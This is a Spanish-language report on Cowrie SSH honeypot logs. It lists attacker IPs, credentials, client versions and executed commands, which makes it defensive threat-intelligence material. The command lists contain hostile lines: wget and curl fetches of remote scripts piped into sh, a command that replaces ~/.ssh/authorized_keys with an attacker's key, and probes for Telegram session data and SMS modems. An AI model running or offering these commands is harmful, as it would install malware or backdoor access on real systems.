======================================================================== ANÁLISIS COWRIE LOGS Archivo: cowrie_ok.json Fecha: Sat May 17 20:36:49 -03 2025 ======================================================================== 1) Top 20 IPs de origen (con país) 159.223.200.138 180424 US, United States 178.19.106.86 1974 PL, Poland 5.178.96.38 1958 GB, United Kingdom 196.251.88.103 1870 NL, Netherlands 170.64.147.99 1870 AU, Australia 134.199.172.30 1870 AU, Australia 79.175.176.177 1667 IR, Iran, Islamic Republic of 46.101.118.69 1419 DE, Germany 45.135.232.24 1296 RU, Russian Federation 158.101.158.236 1236 JP, Japan 8.219.249.60 764 SG, Singapore 165.154.252.24 539 GB, United Kingdom 185.93.89.118 480 IR, Iran, Islamic Republic of 139.19.117.130 472 DE, Germany 116.110.16.229 451 VN, Vietnam 116.110.85.21 439 VN, Vietnam 171.251.18.242 420 VN, Vietnam 116.110.121.52 412 VN, Vietnam 116.110.2.180 390 VN, Vietnam 47.242.136.130 376 HK, Hong Kong 2) Top 10 comandos ejecutados 22646 echo -e "\x6F\x6B" 1560 uname -s -v -n -r -m 10 cd ~; chattr -ia .ssh; lockr -ia .ssh 10 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ 8 uname -a 6 ps | grep '[Mm]iner' 6 ps -ef | grep '[Mm]iner' 6 ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* 6 locate D877F783D5D3EF8Cs 6 ifconfig 6 echo Hi | cat -n 6 cat /proc/cpuinfo 6 /ip cloud print 4 ls 4 id 3 wget -qO - http://61.215.151.173/x/2sh | sh > /dev/null 2>&1 & 3 wget -qO - http://61.215.151.173/x/1sh | sh > /dev/null 2>&1 & 3 rm -rf /var/run/1sh; wget -c http://61.215.151.173/x/1sh -P /var/run && sh /var/run/1sh & 3 rm -rf /tmp/2sh; wget -c http://61.215.151.173/x/2sh -P /tmp && sh /tmp/2sh & 3 pwd 3) Intentos de Logueos (OK vs FAIL) OK: 24845 FAIL : 955 4) Top 10 usuarios con más fallos de login 183 root 45 admin 23 oracle 20 ftp 19 ftptest 18 user 18 test 15 guido 11 pi 10 git 5) Top 10 contraseñas más usadas en fallos de login 158 null 105 123456 21 root 18 123 13 admin 13 abc123 12 1234 11 password 9 345gs5662d34 8 12345678 6) Duración de sesiones (cowrie.session.closed) Sesiones totales: 26238 Duración media: 2.65 s Duración máxima: 376.50 s 7) Top 20 SSH clientes versiones 24989 SSH-2.0-Go 385 SSH-2.0-AsyncSSH_2.1.0 118 SSH-2.0-libssh2_1.11.1 107 SSH-2.0-JSCH-0.1.51 53 SSH-2.0-libssh_0.11.1 38 SSH-2.0-libssh2_1.9.0 23 SSH-2.0-OPENSSH_7.9 19 SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3 19 SSH-2.0-OpenSSH_10.0p2 Debian-2 16 SSH-2.0-ZGrab ZGrab SSH Survey 13 SSH-2.0-OpenSSH_8.9p19 12 SSH-2.0-Nmap-SSH2-Hostkey 6 SSH-2.0-libssh2_1.11.0 6 SSH-2.0-OpenSSH_5.3 6 GET / HTTP/1.1 5 SSH-2.0-libssh_0.9.5 4 SSH-2.0-libssh_0.9.6 4 SSH-2.0-libssh_0.10.5 4 SSH-2.0-OpenSSH_7.9p1 Raspbian-10+deb10u2 4 MGLNDD_181.46.193.237_22 8) Detectar descargas con wget/curl 3 wget -qO - http://61.215.151.173/x/2sh | sh > /dev/null 2>&1 & 3 wget -qO - http://61.215.151.173/x/1sh | sh > /dev/null 2>&1 & 3 rm -rf /var/run/1sh; wget -c http://61.215.151.173/x/1sh -P /var/run && sh /var/run/1sh & 3 rm -rf /tmp/2sh; wget -c http://61.215.151.173/x/2sh -P /tmp && sh /tmp/2sh & 3 curl http://61.215.151.173/x/3sh | sh ======================================================================== Análisis completado. ========================================================================